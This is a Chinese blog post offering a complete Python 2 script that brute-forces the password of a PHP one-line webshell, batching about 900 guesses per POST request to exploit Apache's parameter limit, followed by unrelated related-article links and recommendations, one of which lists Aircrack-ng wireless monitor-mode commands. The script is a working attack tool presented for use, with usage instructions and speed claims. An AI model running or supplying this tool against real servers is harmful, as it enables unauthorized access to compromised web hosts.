一句话爆破速度提升一千倍python脚本
这个脚本是接地提供的思路,一句话爆破速度提升一千倍,看了他的帖子然而没有看到工具,思路很牛逼,我提供一个Python脚本
本地测试了下,十万密码只需要3秒,速度还是可以的
# coding:utf-8
# __author__ : learn
import threading,Queue,requests
class Add_password:
def __init__(self,dictname,queue):
self.dictname = dictname
self.queue = queue
# 加载字典 以\n分割 保存到list
def load_file(self):
with open(self.dictname,'r') as f:
lines = f.readlines()
return map(lambda x:x.split('\n')[0],lines)
#========================
'''分割数量大于 900 密码数量的字典算法
因为apache 最多传入1000个参数。 如果 密码数量大于900 就分割字典
'''
def split_file(self):
file_read = self.load_file()
file_list = []
if len(file_read) < 900:
file_list.append(file_read)
elif len(file_read)%900 !=0 and len(file_read)/900 >= 1:
split_num = len(file_read)
for num in range(split_num/900-1):
file_list.append(file_read[num*900:num*900+900])
file_list.append(file_read[split_num/900*900:])
return file_list
# 主要的部分 用来生成payload 加入队列
# 待post参数的格式为 {"pass":"echo 'pass';","pass2":"echo 'pass2';",...}
def main(self):
php_passwords = self.split_file()
for q in php_passwords:
payloads = [x for x in q]
payload = map(lambda x:{x:"echo '%s';"%x},payloads)
payload = reduce(lambda x,y:dict(x,**y),payload)
self.queue.put(payload)
return
class Main(threading.Thread):
def __init__(self,url,queue):
threading.Thread.__init__(self)
self.url = url
self.queue = queue
self.payloads = {}
def run(self):
while True:
if self.queue.empty():
break
data = self.queue.get_nowait()
req = requests.post(self.url,data=data)
#这里我判断的是 post之后的页面有没有echo的值 导致脚本局限性很大。
if req.content != '':
print 'Password Found: '+req.content
exit(0)
if __name__ == '__main__':
import sys
threads = []
q = Queue.Queue(maxsize=0)
args = sys.argv
if len(args)<3 or args[1][:4]!='http' or args[2][-3:] != 'txt':
print 'usage: python %s [url]http://www.xxx.com/shell[/url],php password.txt'%args[0]
sys.exit(0)
Add_password(args[2],q).main()
for i in range(15):#这里可以适当的修改,速度会提高
threads.append(Main(args[1],q))
for t in threads:
t.start()
for j in threads:
j.join()
一句话爆破速度提升一千倍python脚本的更多相关文章
- 更快的Maven来了,我的天,速度提升了8倍!
周末被 maven-mvnd 刷屏了,于是我也下载了一个 mvnd 体验了一把.虽然测试的数据都是基于我本地项目,不具备普适性和权威性,但也足以说明问题.它的测试结果远远超出我的预期,下面一起来看. ...
- numba,让python速度提升百倍
python由于它动态解释性语言的特性,跑起代码来相比java.c++要慢很多,尤其在做科学计算的时候,十亿百亿级别的运算,让python的这种劣势更加凸显. 办法永远比困难多,numba就是解决py ...
- 有史以来性价比最高最让人感动的一次数据库&SQL优化(DB & SQL TUNING)——半小时性能提升千倍
昨天,一个客户现场人员急急忙忙打电话找我,说需要帮忙调优系统,因为经常给他们干活,所以,也就没多说什么,先了解情况,据他们说,就是他们的系统最近才出现了明显的反应迟钝问题,他们的那个系统我很了解,软硬 ...
- 修改一行SQL代码 性能提升了N倍
在PostgreSQL中修改了一行不明显的代码,把(ANY(ARRAY[...]) 改成 ANY(VALUES(...))),结果查询时间从20s变为0.2s.最初我们学习使用EXPLAN ANALY ...
- 修改一行SQL代码 性能提升了100倍
在PostgreSQL中修改了一行不明显的代码,把(ANY(ARRAY[...]) 改成 ANY(VALUES(...))),结果查询时间从20s变为0.2s.最初我们学习使用 EXPLAN ANAL ...
- 深深感受 Promise.all 带来的速度提升
什么是Promise Promise 是异步编程的一种解决方案,比传统的解决方案——回调函数和事件——更合理和更强大.(摘抄自 阮一峰老师的 ECMAScript 6 入门).具体请查看阮一峰老师的这 ...
- python之提速千倍爆破一句话
看了一下冰河大佬写的文章特别有感:https://bbs.ichunqiu.com/thread-16952-1-1.html 简单描述一下: 利用传统的单数据提交模式. 比如下面这个一句话木马: & ...
- 使用Apache Spark 对 mysql 调优 查询速度提升10倍以上
在这篇文章中我们将讨论如何利用 Apache Spark 来提升 MySQL 的查询性能. 介绍 在我的前一篇文章Apache Spark with MySQL 中介绍了如何利用 Apache Spa ...
- 如何将 iOS 工程打包速度提升十倍以上
如何将 iOS 工程打包速度提升十倍以上 过慢的编译速度有非常明显的副作用.一方面,程序员在等待打包的过程中可能会分心,比如刷刷朋友圈,看条新闻等等.这种认知上下文的切换会带来很多隐形的时间浪费. ...
随机推荐
- 使用Aircrack-ng进行无线安全审计
设置监听模式 激活网卡 ifconfig wlan0 up 结束占用网络接口的进程 airmon-ng check kill 开启监听模式 airmon-ng start wlan0 查看网卡是否成功 ...
- DirectX标准规定 DirectX和OpenGL的不同
DirectX标准规定 DirectX使用左手坐标系. X轴正向指向右,Y轴正向指向上,Z轴正向垂直纸面向内. 编写Direct3D应用程序时,通常只使用4×4的矩阵和1×4的行向量,相乘时行向量在前 ...
- 把应用push到/system/app上面后,出现java.lang.UnsatisfiedLinkError的问题
把应用push到/system/app下面后,加载.so库的问题 01-01 00:07:08.186: E/MessageQueue-JNI(2683): java.lang.Unsatisfied ...
- 【代码笔记】iOS-关于UIFont的一些define
一,效果图. 二,工程图. 三,代码. RootViewController.h #import <UIKit/UIKit.h> @interface RootViewController ...
- WPF学习之路(七)应用程序和窗口
手动创建应用程序 1.创建Empty Project 2.添加引用 3.添加 ManualApp.cs 并添加下面的代码 [STAThread] public static void Main() { ...
- [css]我要用css画幅画(一)
几年前开始就一直想用css画幅画. 今天才真正开始, 从简单的开始. 作为一个工作压力那么大的程序员,我首先要画一个太阳. html如下: <!DOCTYPE html> <html ...
- selenium+python测试
pip install selenium, 得有图形界面, 这里简单的先演示一个打开浏览器,输入网址的demo,以百度为例 # encoding = utf-8 from selenium impor ...
- C++自定义修饰键,实现如<Capslock+J>等组合键的按键映射
前:所谓修饰键,就是Ctrl,Alt,Shift,Win这些按键. Update: 我使用AHK写了一个功能更丰富的脚本:https://github.com/h46incon/ModifierCus ...
- Sqlite学习笔记(四)&&SQLite-WAL原理
Sqlite学习笔记(三)&&WAL性能测试中列出了几种典型场景下WAL的性能数据,了解到WAL确实有性能优势,这篇文章将会详细分析WAL的原理,做到知其然,更要知其所以然. WAL是 ...
- JavaWeb防止表单重复提交(转载)
转载自:http://blog.csdn.net/ye1992/article/details/42873219 在平时开发中,如果网速比较慢的情况下,用户提交表单后,发现服务器半天都没有响应,那么用 ...